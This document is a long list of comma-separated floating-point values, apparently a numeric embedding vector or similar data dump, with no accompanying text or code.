0.030563078820705414, -0.03428153321146965, -0.002750106155872345, -0.02146265283226967, -0.005699997767806053, 0.04615448787808418, -0.048763930797576904, 0.001972370548173785, 0.02113647200167179, -0.03858710825443268, 0.04439311474561691, -0.0012109437957406044, -0.004042595159262419, -0.041490111500024796, 0.04201200231909752, -0.03803260251879692, -0.05349354073405266, -0.0034717798698693514, 0.01341415848582983, -0.013438621535897255, -0.03062831424176693, 0.004056865349411964, -0.05235191062092781, 0.045958779752254486, -0.01314505934715271, 0.0011946347076445818, 0.013047205284237862, -0.015102140605449677, 0.05610298365354538, 0.017956215888261795, -0.0008929180912673473, 0.027627456933259964, 0.0029988186433911324, 0.03320513665676117, -0.003223067382350564, -0.01748325489461422, -0.009858794510364532, 0.04002230241894722, 0.023974239826202393, -0.028018873184919357, 0.005683688912540674, -0.04292530566453934, 0.02353389747440815, -0.029878100380301476, -0.009271670132875443, 0.017499564215540886, 0.01626008003950119, 0.034542474895715714, 0.044654060155153275, -0.030742477625608444, 0.017597418278455734, 0.019407717511057854, -0.03315621241927147, 0.014278535731136799, -0.001011158456094563, -0.022522738203406334, -0.022457502782344818, -0.006352358032017946, -0.03767380490899086, -0.04165320470929146, -0.041946765035390854, -0.0032026811968535185, -0.02615964598953724, -0.022033467888832092, 0.04276221618056297, -0.0028336900286376476, 0.011465231887996197, 0.006857937201857567, -0.048894401639699936, -0.015844199806451797, -0.01797252520918846, 0.0123132998123765, -0.013120596297085285, -0.0244308914989233, 0.022734755650162697, 0.02289784513413906, 0.0015758577501401305, 0.007392057217657566, 0.020223168656229973, -0.008586691692471504, -0.01842917688190937, 0.01608068123459816, 0.015640337020158768, 0.004953860770910978, 0.03447724133729935, 0.004056865349411964, 0.013675102032721043, 0.022392265498638153, 0.03790213167667389, -0.007563301827758551, -0.007118881214410067, -0.010372527875006199, -0.026942478492856026, -0.00839913822710514, 0.010176819749176502, 0.036075521260499954, -0.005275963805615902, 0.02366436831653118, 0.026534754782915115, 0.003716415027156472, -0.008113730698823929, -0.01016051135957241, -0.05414590239524841, -0.0007262604776769876, -0.005536907818168402, -0.015689264982938766, -0.01574634574353695, 0.00800364464521408, -0.022555356845259666, -0.013308149762451649, -0.0013312227092683315, 0.011783257126808167, -0.011489694938063622, 0.022881535813212395, 0.019799133762717247, -0.0331888273358345, -0.011220596730709076, 0.008374675177037716, -0.010225746780633926, -0.027806855738162994, 0.009516305290162563, 0.015395702794194221, 0.031003421172499657, 0.00036848161835223436, -0.0549287348985672, -0.00989141222089529, 0.01009527500718832, 0.038097839802503586, -0.045730456709861755, -0.030416296795010567, 0.044327881187200546, 0.00634828070178628, -0.03035106137394905, -0.02430042065680027, -0.04292530566453934, 0.010038193315267563, -0.024333037436008453, -0.0030844409484416246, -0.0370214469730854, 0.006968023255467415, 0.004550212994217873, 0.03147638216614723, 0.03640170395374298, -0.009002571925520897, -0.015297848731279373, -0.00724935345351696, 0.04331672191619873, 0.033955350518226624, 0.022539047524333, 0.0001530243462184444, -0.004574676509946585, 0.008170812390744686, -0.01888583041727543, 0.002762337913736701, -0.0008358365739695728, -0.011897420510649681, 0.040544189512729645, -0.0055899121798574924, -0.006103645544499159, -0.00016882370982784778, 0.04175105690956116, -0.008668237365782261, -0.021381108090281487, -0.02858968824148178, 0.026127029210329056, -0.033368226140737534, 0.007722314912825823, -0.026893552392721176, 0.02529526874423027, 0.008113730698823929, 0.02511586993932724, -0.008937335573136806, 0.001695117331109941, 0.0253768153488636, 0.006507293786853552, 0.0006788623868487775, 0.017287546768784523, -0.006254503969103098, 0.003284226171672344, -0.020516730844974518, 0.029747627675533295, -0.010772098787128925, 0.021446343511343002, 0.009434760548174381, -0.005365663208067417, -0.0051699550822377205, -0.007208581082522869, -0.006617379374802113, -0.0009994363645091653, -0.00810149870812893, 0.012288836762309074, -0.039859212934970856, -0.004599140025675297, 0.013365231454372406, -0.006596993189305067, 0.04657852277159691, -0.03160685673356056, -0.013087977655231953, 0.023680677637457848, -0.015126603655517101, -0.017499564215540886, -0.0007700909045524895, -0.03933732584118843, 0.010992270894348621, -0.04494762420654297, -0.025132179260253906, 0.006972100585699081, 0.00003507073415676132, -0.015444629825651646, 0.0010167646687477827, 0.018005143851041794, 0.008052571676671505, -0.007718237582594156, 0.0165699515491724, 0.0002415771596133709, -0.016349779441952705, -0.016504714265465736, 0.0027011793572455645, 0.00005552070069825277, 0.006009868811815977, 0.00017888941511046141, 0.007873172871768475, -0.010788408108055592, -0.02317509800195694, 0.03904376178979874, -0.005724461283534765, -0.03669526427984238, -0.02971501089632511, 0.010984116233885288, 0.029731320217251778, -0.016700422391295433, -0.03111758455634117, 0.035488396883010864, 0.016023598611354828, 0.02917681261897087, 0.04755706340074539, -0.004827465862035751, 0.013185831718146801, -0.00426888233050704, 0.026795698329806328, 0.014971667900681496, -0.0005692862905561924, 0.021984541788697243, 0.019945915788412094, -0.03689097240567207, 0.017320165410637856, -0.020712438970804214, 0.0065766070038080215, 0.01397681888192892, -0.014506861567497253, -0.030432606115937233, -0.015550637617707253, -0.012745488435029984, -0.032944194972515106, 0.04344719275832176, 0.012362226843833923, -0.03211243450641632, -0.02082660235464573, 0.021837759763002396, 0.03659741207957268, -0.010282828472554684, -0.010967806912958622, -0.024626599624753, 0.015126603655517101, 0.0087823998183012, -0.013683256693184376, -0.009304288774728775, -0.016251925379037857, 0.011261369101703167, 0.020859219133853912, -0.013308149762451649, 0.007726391777396202, 0.022457502782344818, -0.03861972689628601, -0.01237853616476059, 0.0035594406072050333, 0.0034717798698693514, 0.0195544995367527, -0.0007165769929997623, 0.04295792430639267, 0.03266694024205208, 0.006062873173505068, -0.0034880887251347303, -0.00021443795412778854, -0.046089254319667816, 0.0013893235009163618, 0.010396991856396198, -0.017450638115406036, -0.016733041033148766, -0.036923591047525406, -0.004798925016075373, 0.013927891850471497, 0.012329609133303165, -0.005149568896740675, -0.00603025546297431, 0.017466945573687553, -0.004966092761605978, 0.013446776196360588, -0.02782316505908966, -0.007918022572994232, 0.014392698183655739, -0.023191407322883606, -0.013373385183513165, -0.014270381070673466, 0.0005804987158626318, 0.015216303057968616, 0.015273384749889374, -0.03296050429344177, 0.006968023255467415, 0.001905095879919827, -0.01860857754945755, -0.017059221863746643, -0.01789098046720028, 0.008211584761738777, 0.010690554045140743, 0.02416994795203209, 0.030644623562693596, 0.01648840494453907, -0.030155353248119354, 0.00752252945676446, -0.004215878434479237, 0.002882616827264428, -0.017630036920309067, -0.01165278535336256, 0.009499995969235897, -0.00763261504471302, -0.02629011869430542, 0.023974239826202393, -0.00486823869869113, -0.004305577836930752, -0.010372527875006199, 0.03106865845620632, -0.024903852492570877, -0.017548492178320885, 0.028377672657370567, -0.022930463775992393, 0.02353389747440815, 0.003979397471994162, -0.0009428644552826881, 0.008321670815348625, -0.007416520733386278, -0.011285833083093166, 0.019587116315960884, -0.024854926392436028, -0.017418019473552704, -0.022653210908174515, -0.036564793437719345, 0.012476390227675438, -0.02588239312171936, -0.0004286210751160979, 0.014017591252923012, 0.00005087008685222827, 0.008407292887568474, -0.013226604089140892, -0.04351243004202843, 0.030383680015802383, 0.010339910164475441, -0.013357076793909073, -0.016048062592744827, 0.018641194328665733, -0.007828323170542717, -0.012835188768804073, 0.023060934618115425, 0.009222743101418018, 0.011326605454087257, 0.01113089732825756, -0.015844199806451797, 0.00936952419579029, -0.012867806479334831, 0.0023016086779534817, 0.005960941780358553, -0.05000341311097145, 0.022653210908174515, 0.004725534934550524, 0.05319998040795326, 0.009614159353077412, -0.0351295992732048, -0.015909435227513313, -0.013430466875433922, 0.030872950330376625, -0.01585235446691513, -0.007971026934683323, -0.009589696303009987, -0.00679677864536643, -0.0036511789076030254, -0.007669310551136732, 0.01630900613963604, -0.022163940593600273, -0.01506136730313301, -0.0062585812993347645, -0.0013944200472906232, 0.026078101247549057, -0.0019988727290183306, 0.022832609713077545, -0.013332612812519073, 0.0018102996982634068, 0.007697851397097111, 0.014343771152198315, -0.0430883951485157, 0.00601802347227931, 0.017320165410637856, 0.010698708705604076, 0.007706005591899157, -0.03193303570151329, 0.01847810484468937, -0.04175105690956116, 0.005765233654528856, 0.012843342497944832, -0.008611155673861504, 0.018575958907604218, -0.002097745891660452, 0.0012190982233732939, 0.007188194897025824, -0.011905575171113014, -0.00856222864240408, 0.026730462908744812, -0.03450985997915268, -0.030644623562693596, -0.011603858321905136, -0.0023240335285663605, 0.0032679173164069653, 0.00953261461108923, -0.03266694024205208, 0.008823172189295292, 0.013724029064178467, -0.02539312280714512, -0.053363069891929626, -0.001865342608653009, -0.01914677396416664, -0.0142540717497468, 0.004160835407674313, -0.033857498317956924, 0.004603217355906963, 0.0004148603475186974, 0.008692700415849686, 0.03372702747583389, -0.0020355680026113987, 0.015591409988701344, 0.00037740060361102223, 0.009801712818443775, -0.009075962007045746, -0.021332180127501488, 0.008264589123427868, -0.018445486202836037, 0.005390126723796129, 0.0024443124420940876, -0.05202573165297508, 0.00953261461108923, -0.0009601927595213056, 0.0022200634703040123, 0.01702660322189331, 0.01883690245449543, 0.004048711154609919, -0.006837551016360521, 0.001085568219423294, -0.006548066157847643, 0.027203423902392387, -0.0008434814517386258, 0.013495703227818012, 0.015436475165188313, 0.010413301177322865, -0.006499139126390219, 0.026502136141061783, -0.03026951663196087, -0.017401710152626038, -0.0033209214452654123, -0.022865228354930878, -0.004586908034980297, -0.028393980115652084, -0.012264372780919075, 0.003659333335235715, -0.006164804566651583, 0.006992486771196127, 0.003857080126181245, 0.02182145044207573, -0.009703858755528927, 0.01610514335334301, -0.02886694110929966, 0.009866949170827866, -0.00738390302285552, 0.010348064824938774, 0.03865234553813934, 0.00446051312610507, 0.030106427147984505, 0.00497832428663969, -0.034444622695446014, -0.004917165730148554, 0.0060506416484713554, 0.010967806912958622, -0.011285833083093166, -0.04987294226884842, -0.003928431775420904, -0.018641194328665733, -0.019750207662582397, -0.024447200819849968, 0.0045257494784891605, 0.04961199685931206, -0.03581457957625389, -0.012125746347010136, 0.009899566881358624, -0.006543988827615976, -0.0030171661637723446, 0.01779312640428543, 0.000398296513594687, 0.03676050156354904, -0.004896779078990221, 0.006959868595004082, 0.010021884925663471, -0.021527888253331184, -0.0038122304249554873, -0.03486865758895874, -0.038782816380262375, -0.0013200102839618921, 0.00291319633834064, -0.008815018460154533, -0.056853197515010834, -0.0007328859646804631, 0.030057499185204506, 0.050655774772167206, -0.0070373364724218845, -0.007355362176895142, -0.022522738203406334, -0.01748325489461422, -0.011008579283952713, -0.002273067831993103, 0.028345054015517235, -0.019163083285093307, -0.015452783554792404, -0.002882616827264428, 0.0352274551987648, 0.00953261461108923, -0.013601711951196194, 0.021348489448428154, 0.029600847512483597, 0.003897852497175336, -0.02687724307179451, -0.04259912669658661, -0.018363941460847855, -0.011530467309057713, -0.03640170395374298, 0.02028840407729149, -0.009842485189437866, 0.05858195200562477, 0.006919096224009991, -0.018445486202836037, 0.007913945242762566, 0.03070985898375511, -0.0031211362220346928, -0.005418667569756508, -0.04201200231909752, 0.016651496291160583, -0.021071236580610275, 0.023207716643810272, -0.007436906918883324, -0.03194934502243996, -0.006148495711386204, 0.014033900573849678, 0.03623861446976662, 0.012549780309200287, -0.04873131215572357, -0.004851929377764463, 0.001797048724256456, -0.023974239826202393, -0.010168666020035744, 0.02240857481956482, 0.02240857481956482, 0.0022200634703040123, -0.0030477456748485565, 0.021478962153196335, -0.00040619619539938867, -0.016830895096063614, 0.0006406381726264954, -0.03636908531188965, -0.021837759763002396, -0.028850633651018143, -0.0255235955119133, -0.03162316232919693, -0.03022058866918087, 0.016349779441952705, -0.011514158919453621, -0.008142272010445595, -0.010625317692756653, 0.014172527007758617, 0.002774569671601057, 0.008313516154885292, -0.0264205913990736, -0.006694847252219915, 0.03587981313467026, 0.004590985365211964, -0.028720160946249962, -0.00876609142869711, -0.036662645637989044, -0.022441193461418152, -0.002495278138667345, -0.013878964819014072, 0.013984973542392254, 0.02095707319676876, -0.002483046380802989, 0.01109012495726347, -0.006894632708281279, -0.04132702201604843, -0.018983684480190277, -0.010674244724214077, -0.012574244290590286, -0.0123132998123765, 0.032813720405101776, -0.037739042192697525, -0.013153214007616043, -0.003999784123152494, 0.0025380891747772694, 0.01707552932202816, -0.01147338654845953, -0.002672638511285186, 0.025866083800792694, 0.00724935345351696, 0.01587681844830513, -0.03224290534853935, 0.01661887764930725, 0.0024320806842297316, 0.006164804566651583, -0.0351295992732048, -0.004782616160809994, -0.02457767352461815, -0.007653001230210066, -0.031133893877267838, 0.012549780309200287, 0.015624028630554676, -0.010902570560574532, -0.007086263503879309, 0.016251925379037857, -0.0027949560899287462, -0.012052356265485287, -0.01577080972492695, -0.02271844632923603, 0.0036450629122555256, 0.013764801435172558, 0.0015452783554792404, 0.01300643291324377, -0.02751329354941845, -0.026551062241196632, 0.030285825952887535, 0.0058386242017149925, 0.04380599036812782, -0.025621449574828148, -0.001623765449039638, -0.033955350518226624, 0.007477679755538702, 0.01598282717168331, 0.030106427147984505, 0.0012700639199465513, 0.0012843342265114188, 0.011685403063893318, 0.025001706555485725, 0.002044741762802005, 0.01743432879447937, 0.008578537963330746, 0.017874671146273613, -0.007742701098322868, -0.008456219919025898, 0.016659650951623917, -0.015575101599097252, -0.012566089630126953, 0.006800855975598097, 0.03312359377741814, 0.001892864122055471, -0.02832874469459057, -0.026909861713647842, -0.014042055234313011, 0.009687550365924835, 0.005096564535051584, 0.005455362610518932, -0.009948493912816048, -0.009214588440954685, 0.022147631272673607, -0.006421671248972416, 0.054537318646907806, -0.004203646443784237, -0.02001115120947361, 0.002566630020737648, -0.004599140025675297, -0.0112695237621665, 0.018135614693164825, -0.02715449593961239, -0.012924888171255589, -0.017271237447857857, 0.009842485189437866, -0.03594505041837692, -0.0165699515491724, -0.035390544682741165, 0.01577896438539028, 0.012158364988863468, 0.0028622306417673826, 0.015420165844261646, 0.005190341267734766, 0.007143344730138779, -0.007090340834110975, -0.028084110468626022, 0.03136222064495087, -0.022033467888832092, 0.007420598063617945, -0.02141372673213482, -0.006205576937645674, -0.006478752940893173, 0.0001671673235250637, -0.03266694024205208, 0.002631865907460451, 0.03649955615401268, -0.0490574911236763, 0.015738191083073616, 0.0011548815527930856, -0.034216295927762985, 0.01332445815205574, -0.01587681844830513, 0.008121885359287262, -0.019799133762717247, 0.003587981453165412, -0.008757936768233776, -0.03247123211622238, 0.0053371223621070385, 0.012615016661584377, 0.08715533465147018, 0.015126603655517101, 0.0010213515488430858, -0.023387115448713303, -0.0033881962299346924, 0.01784205250442028, 0.009834331460297108, 0.012248064391314983, -0.01054377295076847, 0.0028031105175614357, 0.03653217479586601, 0.001419902895577252, 0.000510930607561022, -0.013340767472982407, 0.013740338385105133, 0.0187064316123724, -0.012142055667936802, -0.014017591252923012, 0.01815192401409149, 0.0009520382736809552, 0.001438250532373786, -0.00324141513556242, 0.02922574058175087, -0.01829870603978634, 0.012345918454229832, -0.01807037927210331, -0.000547371048014611, -0.03754333406686783, -0.025963937863707542, -0.006124032195657492, -0.004957938101142645, -0.009043344296514988, -0.01429484412074089, 0.016015443950891495, 0.03477080166339874, 0.006144418381154537, 0.005328968167304993, -0.011212442070245743, -0.020174240693449974, -0.019538190215826035, 0.014971667900681496, 0.01860857754945755, -0.025327887386083603, 0.01651286892592907, -0.00021927969646640122, -0.011824029497802258, 0.04181629419326782, -0.009679395705461502, -0.007379825692623854, -0.00647059828042984, -0.01883690245449543, -0.03207981586456299, 0.024773381650447845, 0.030367370694875717, -0.009687550365924835, 0.011155360378324986, 0.0005652090185321867, 0.008586691692471504, -0.016733041033148766, -0.02235964871942997, -0.009557077661156654, 0.004566521849483252, -0.008790554478764534, 0.011872956529259682, 0.018282396718859673, -0.03799998387694359, -0.02105492725968361, -0.00037179439095780253, -0.01029913779348135, 0.024267802014946938, 0.027709001675248146, -0.012973815202713013, 0.0019366946071386337, 0.005720383953303099, -0.009557077661156654, 0.02511586993932724, 0.008823172189295292, 0.008709009736776352, -0.04155534878373146, -0.0035308999940752983, 0.02493647113442421, 0.04070727899670601, 0.011693557724356651, 0.021919304504990578, -0.016447633504867554, 0.022392265498638153, -0.0050435601733624935, 0.0029580460395663977, 0.0032740330789238214, 0.00043218868086114526, -0.0065358346328139305, -0.014629178680479527, 0.0007502143271267414, 0.020810293033719063, -0.009206434711813927, 0.030742477625608444, 0.007599997334182262, -0.018445486202836037, -0.012386690825223923, 0.00025317183462902904, 0.016781967133283615, -0.0137077197432518, 0.02624119259417057, 0.017336474731564522, -0.02095707319676876, 0.001314913621172309, 0.0023342266213148832, 0.006756006274372339, 0.0016125530237331986, -0.004293345846235752, -0.017499564215540886, -0.03172101825475693, -0.0006498119910247624, -0.026078101247549057, -0.0038081530947238207, 0.01598282717168331, 0.010609009303152561, 0.0047948481515049934, -0.015575101599097252, -0.012615016661584377, -0.015664801001548767, -0.0064257485792040825, 0.0333356112241745, -0.013634329661726952, 0.001076394459232688, -0.0004671001515816897, 0.007673387881368399, -0.00589570589363575, 0.054406847804784775, 0.03966350480914116, 0.010674244724214077, 0.0035492475144565105, -0.026224883273243904, -0.007759009953588247, 0.020533040165901184, -0.025409432128071785, 0.010763944126665592, 0.01766265369951725, -0.006882400717586279, 0.010454073548316956, -0.004484976641833782, 0.022783681750297546, 0.0255235955119133, 0.0008047475712373853, -0.009785404428839684, -0.0008424621191807091, 0.021576816216111183, -0.008191199041903019, 0.0006024139584042132, 0.0012659867061302066, 0.00037638130015693605, -0.022539047524333, 0.0006768237799406052, 0.0354231633245945, 0.014572097919881344, 0.004827465862035751, 0.0061321863904595375, -0.01811930723488331, -0.001623765449039638, 0.0053371223621070385, -0.0037408783100545406, 0.022424884140491486, 0.04409955441951752, -0.018983684480190277, 0.004103753715753555, 0.016088835895061493, -0.006776392459869385, -0.05466778948903084, -0.017597418278455734, -0.022653210908174515, -0.004586908034980297, 0.00998111255466938, 0.0011355145834386349, -0.0032679173164069653, 0.026453208178281784, 0.022327030077576637, -0.00026400203933008015, -0.002805149182677269, 0.03039998933672905, -0.035847198218107224, 0.005863087717443705, 0.03786951303482056, -0.013063514605164528, 0.010144202038645744, 0.03636908531188965, -0.014596560969948769, 0.002519741654396057, 0.008366520516574383, -0.031084967777132988, 0.027399132028222084, 0.010633472353219986, 0.0393047071993351, -0.02945406548678875, 0.0048763928934931755, -0.01937510073184967, -0.026860933750867844, -0.010984116233885288, -0.0036144836340099573, -0.0167167317122221, 0.022017158567905426, -0.00839913822710514, -0.00724935345351696, -0.01574634574353695, -0.0022159863729029894, -0.0018612653948366642, -0.017010293900966644, 0.004803002346307039, 0.008415447548031807, -0.009475532919168472, -0.004904933739453554, -0.031280674040317535, 0.012875961139798164, 0.017988834530115128, 0.004941629245877266, 0.013128750026226044, -0.006682615727186203, 0.015306002460420132, -0.015917589887976646, -0.007677464745938778, 0.0391089990735054, -0.0303021352738142, 0.02131587266921997, 0.022555356845259666, -0.011465231887996197, -0.01522445771843195, 0.009426605887711048, 0.03969612345099449, -0.026029175147414207, 0.0009270650916732848, 0.00109779997728765, -0.0017114264192059636, 0.0023749989923089743, 0.014262226410210133, 0.017320165410637856, 0.004285191651433706, 0.0015646453248336911, 0.007722314912825823, -0.00925536174327135, -0.005989482626318932, -0.018461795523762703, 0.010209438391029835, -0.0036042905412614346, -0.023974239826202393, -0.00044263663585297763, -0.01615407131612301, -0.000032235770049737766, 0.0035145909059792757, 0.020125314593315125, -0.009614159353077412, 0.03201457858085632, -0.03509698435664177, 0.01653733290731907, 0.006144418381154537, -0.011049351654946804, 0.004937551915645599, 0.01070686336606741, 0.024920161813497543, -0.002678754273802042, 0.0024973165709525347, 0.013609865680336952, 0.005072101019322872, -0.013234758749604225, -0.016398705542087555, 0.016504714265465736, -0.022490119561553, 0.029242049902677536, -0.00705772265791893, 0.014930895529687405, 0.003324998775497079, -0.003074247855693102, 0.024969089776277542, 0.009312442503869534, 0.02854076214134693, -0.006454289425164461, -0.028263509273529053, 0.004073174204677343, 0.0011518235551193357, -0.016170380637049675, -0.010152356699109077, -0.00640128506347537, -0.01294119656085968, 0.06778023391962051, 0.008081112988293171, 0.002464698627591133, 0.011073815636336803, -0.01452317088842392, -0.02827981859445572, -0.007000640965998173, -0.004103753715753555, -0.001196673372760415, -0.005679611582309008, -0.006747851613909006, -0.012818879447877407, -0.030155353248119354, 0.02547466941177845, -0.008660082705318928, -0.019358791410923004, 0.03255277872085571, -0.013308149762451649, 0.015738191083073616, 0.018233468756079674, 0.016406860202550888, 0.006323817186057568, 0.008089267648756504, -0.005324890837073326, 0.00419956911355257, -0.018054069951176643, -0.00271544954739511, 0.005875319708138704, -0.016480252146720886, 0.009524459950625896, -0.0410986952483654, -0.013177677057683468, -0.0165699515491724, 0.00601802347227931, -0.005455362610518932, -0.004811157006770372, 0.014466089196503162, -0.001639055204577744, 0.010046347975730896, 0.015942053869366646, -0.017499564215540886, -0.047589682042598724, -0.023158788681030273, -0.005830470006912947, 0.009948493912816048, -0.010592699982225895, -0.005667380057275295, 0.0012598708271980286, -0.03292788565158844, 0.02601286582648754, 0.012924888171255589, 0.03369440883398056, -0.0035329386591911316, 0.006389053538441658, -0.011098278686404228, 0.010176819749176502, -0.0032393764704465866, -0.010380682535469532, 0.004301500506699085, -0.025050634518265724, 0.0274643674492836, -0.02146265283226967, -0.002629827242344618, 0.033987969160079956, 0.015330466441810131, 0.003145599737763405, -0.002260836074128747, 0.005088409874588251, -0.02407209388911724, -0.03175363689661026, -0.027252350002527237, -0.0036511789076030254, 0.01679827645421028, 0.012949351221323013, 0.015477247536182404, 0.0018694199388846755, 0.009614159353077412, 0.008407292887568474, -0.01540385652333498, -0.028524452820420265, 0.023876385763287544, -0.003247530898079276, 0.0010570274898782372, 0.02289784513413906, 0.000043575626477831975, -0.006152572575956583, 0.01528969407081604, 0.02381115034222603, -0.017369091510772705, -0.02204977720975876, 0.007530683651566505, -0.005952787585556507, 0.0029560073744505644, -0.006658152211457491, 0.018445486202836037, 0.02894848771393299, 0.008619310334324837, -0.014898277819156647, 0.021022310480475426, -0.006001714617013931, -0.002350535709410906, -0.000992810819298029, 0.0024687759578227997, -0.04191414639353752, 0.0033922733273357153, -0.004128217231482267, 0.0010274674277752638, 0.008448065258562565, -0.019489262253046036, 0.0015534328995272517, 0.018999991938471794, 0.019277246668934822, 0.04380599036812782, 0.006005791947245598, -0.008068880997598171, -0.003940663766115904, 0.012451926246285439, -0.032683249562978745, 0.014947204850614071, 0.022702137008309364, 0.006054718978703022, -0.01572188176214695, 0.021201709285378456, -0.005247422959655523, 0.008529610931873322, 0.014555788598954678, -0.011318450793623924, 0.040674664080142975, -0.010755790397524834, 0.010551927611231804, -0.012753643095493317, 0.006894632708281279, -0.01932617276906967, -0.014311153441667557, 0.010804717428982258, 0.0035716723650693893, -0.005883474368602037, -0.0067437742836773396, 0.0025931319687515497, 0.02090814709663391, 0.023419734090566635, -0.02664891630411148, -0.029372520744800568, -0.0038958140648901463, -0.012484544888138771, -0.0011487656738609076, 0.0000274258891295176, 0.004790770821273327, -0.0037123376969248056, 0.013724029064178467, 0.011554931290447712, 0.023778531700372696, 0.010674244724214077, 0.013960509561002254, -0.010054502636194229, -0.007502143271267414, 0.005883474368602037, 0.010396991856396198, -0.006825319491326809, 0.003869311884045601, 0.0023016086779534817, -0.01165278535336256, 0.00030553905526176095, -0.006772315129637718, -0.016830895096063614, -0.005063946824520826, -0.0126884076744318, -0.002118132309988141, -0.0035574021749198437, 0.027382822707295418, -0.0051291827112436295, 0.005789697170257568, 0.01316952332854271, -0.0009591734851710498, -0.017874671146273613, 0.002440235111862421, 0.0027664152439683676, 0.0029702777974307537, 0.004325964022427797, 0.022392265498638153, -0.008709009736776352, 0.019750207662582397, 0.005773388314992189, 0.0028255353681743145, 0.0073064351454377174, 0.0093532158061862, -0.0063686673529446125, -0.008823172189295292, -0.02041887678205967, 0.02547466941177845, -0.01391158252954483, 0.010290983133018017, -0.00014665364869870245, -0.002063089283183217, -0.004823388531804085, -0.021576816216111183, -0.02583346702158451, 0.007518452126532793, -0.000055871088989079, -0.00957338698208332, 0.007799782324582338, -0.0046643759123981, -0.0029295054264366627, -0.003828539280220866, 0.003655256237834692, -0.0002815852058120072, 0.011506004258990288, 0.013259222730994225, 0.010176819749176502, 0.01413990929722786, 0.010625317692756653, -0.013634329661726952, 0.007718237582594156, 0.017809435725212097, 0.008374675177037716, 0.010869952850043774, 0.028263509273529053, 0.013120596297085285, -0.003031436586752534, 0.0006396188400685787, -0.01294119656085968, 0.017515873536467552, -0.008162657730281353, 0.027219731360673904, -0.009883258491754532, -0.012924888171255589, 0.007400211878120899, 0.007245276123285294, -0.017988834530115128, -0.002709333784878254, -0.004427895415574312, -0.005214804783463478, 0.011432614177465439, -0.003147638402879238, -0.004054826684296131, -0.01113089732825756, -0.006519525311887264, -0.025262651965022087, 0.006825319491326809, 0.011424459517002106, 0.002362767467275262, 0.006507293786853552, -0.020565656945109367, -0.0025258574169129133, 0.014245917089283466, 0.004301500506699085, 0.010519308969378471, -0.0016726924804970622, -0.011489694938063622, -0.005410512909293175, -0.012223600409924984, -0.012231755070388317, -0.006079182494431734, -0.0006839589914306998, -0.008855790831148624, 0.022245485335588455, -0.00757961068302393, 0.00860300101339817, -0.005284118000417948, 0.013454930856823921, 0.008138194680213928, 0.002656329423189163, 0.03212874382734299, -0.002799033187329769, -0.023256642743945122, -0.0021813297644257545, -0.022702137008309364, -0.018673812970519066, 0.014017591252923012, -0.0028071878477931023, 0.006013946142047644, -0.008350211195647717, -0.011522313579916954, -0.008790554478764534, 0.014066518284380436, -0.003846887033432722, -0.0002958555705845356, -0.013332612812519073, 0.0205982755869627, -0.0038652345538139343, -0.013740338385105133, 0.011081970296800137, 0.02723604068160057, 0.01476780604571104, 0.001531008048914373, 0.0015045058680698276, 0.016651496291160583, 0.004285191651433706, -0.03669526427984238, 0.007339052855968475, 0.015705574303865433, -0.006026178132742643, 0.01597467251121998, -0.008855790831148624, 0.013805573806166649, -0.01484119612723589, -0.004684762097895145, 0.0051699550822377205, -0.0057978518307209015, 0.012639480642974377, 0.013968664221465588, -0.027855783700942993, -0.008448065258562565, -0.0015412011416628957, -0.00608733668923378, 0.01515922136604786, -0.011628321371972561, -0.007253430783748627, -0.01082102581858635, 0.005284118000417948, 0.0167167317122221, -0.024202566593885422, -0.0030701705254614353, -0.012647634372115135, -0.007049567997455597, -0.031084967777132988, -0.014539479278028011, -0.00995664857327938, 0.001991737401112914, -0.011016733944416046, 0.002165020676329732, -0.02348496951162815, -0.01113089732825756, -0.01661887764930725, 0.005830470006912947, 0.015624028630554676, -0.0018041838193312287, -0.007763087283819914, -0.023778531700372696, 0.005492058116942644, -0.010519308969378471, 0.010739481076598167, -0.0038122304249554873, -0.017336474731564522, -0.006772315129637718, -0.005333045031875372, -0.009018880315124989, -0.0028031105175614357, -0.034216295927762985, 0.015713727101683617, 0.003516629571095109, -0.004325964022427797, 0.014629178680479527, 0.017010293900966644, -0.014547633938491344, -0.005398281384259462, 0.00835836585611105, -0.011049351654946804, -0.003414698177948594, 0.02231072075664997, 0.02692617103457451, 0.017010293900966644, 0.030008573085069656, -0.007693774066865444, 0.015110294334590435, -0.005610298365354538, -0.00820750743150711, 0.0035981745459139347, -0.005394204054027796, -0.00014971158816479146, -0.010372527875006199, 0.015069521963596344, 0.013430466875433922, -0.025784539058804512, 0.01027467381209135, 0.010951497592031956, -0.016830895096063614, 0.007750855293124914, 0.018673812970519066, 0.006772315129637718, 0.014090982265770435, -0.005561371333897114, 0.012933041900396347, 0.02345235086977482, -0.002949891611933708, -0.014653642661869526, -0.0033535396214574575, 0.00601802347227931, 0.006694847252219915, 0.018592268228530884, 0.013128750026226044, -0.011660940013825893, 0.02480599842965603, 0.01036437414586544, 0.001082510338164866, 0.022115012630820274, 0.00252381875179708, 0.011930038221180439, 0.014506861567497253, -0.003259762655943632, 0.009720168076455593, -0.005985405296087265, -0.002236372558400035, -0.016659650951623917, -0.016194844618439674, 0.003797960001975298, -0.0048193116672337055, -0.01418068166822195, 0.011701712384819984, 0.0020427030976861715, -0.006825319491326809, -0.007636692374944687, -0.009809867478907108, -0.002642059000208974, -0.022555356845259666, -0.00008466668077744544, -0.010111584328114986, -0.0005631704116240144, -0.012778107076883316, 0.007803859654814005, -0.006405362393707037, 0.013560938648879528, 0.003594097448512912, 0.007877250202000141, -0.028605997562408447, -0.006446134764701128, 0.0156484916806221, -0.0037938826717436314, 0.004022208973765373, -0.001567703322507441, -0.0031965654343366623, -0.010698708705604076, 0.019750207662582397, -0.014645488001406193, 0.025915011763572693, 0.001543239806778729, 0.008717164397239685, 0.0035635179374367, -0.007689696736633778, 0.018722739070653915, -0.00856222864240408, 0.001982563640922308, -0.011465231887996197, -0.008480683900415897, 0.015126603655517101, 0.012704716064035892, -0.02810041792690754, 0.03216136246919632, -0.01838025078177452, -0.01838025078177452, 0.018494414165616035, 0.001972370548173785, -0.012769952416419983, 0.0017491410253569484, 0.009361369535326958, -0.0006681596278212965, -0.010739481076598167, -0.02276737429201603, 0.005165877752006054, 0.011921883560717106, 0.016023598611354828, 0.029144195839762688, 0.004132294561713934, -0.000017583148292033002, -0.007457293104380369, 0.0017776817549020052, -0.019505571573972702, -0.010576390661299229, 0.010592699982225895, 0.03685835376381874, 0.013365231454372406, -0.007363516371697187, 0.014775959774851799, 0.0030416296795010567, -0.0011100317351520061, -0.003846887033432722, -0.001351608894765377, -0.031916726380586624, 0.02677938900887966, -0.015640337020158768, 0.010878107510507107, -0.014302998781204224, -0.0016135723562911153, 0.012957505881786346, -0.0027317586354911327, -0.008733472786843777, -0.00815450306981802, 0.00323529914021492, -0.01582789048552513, -0.005194418597966433, 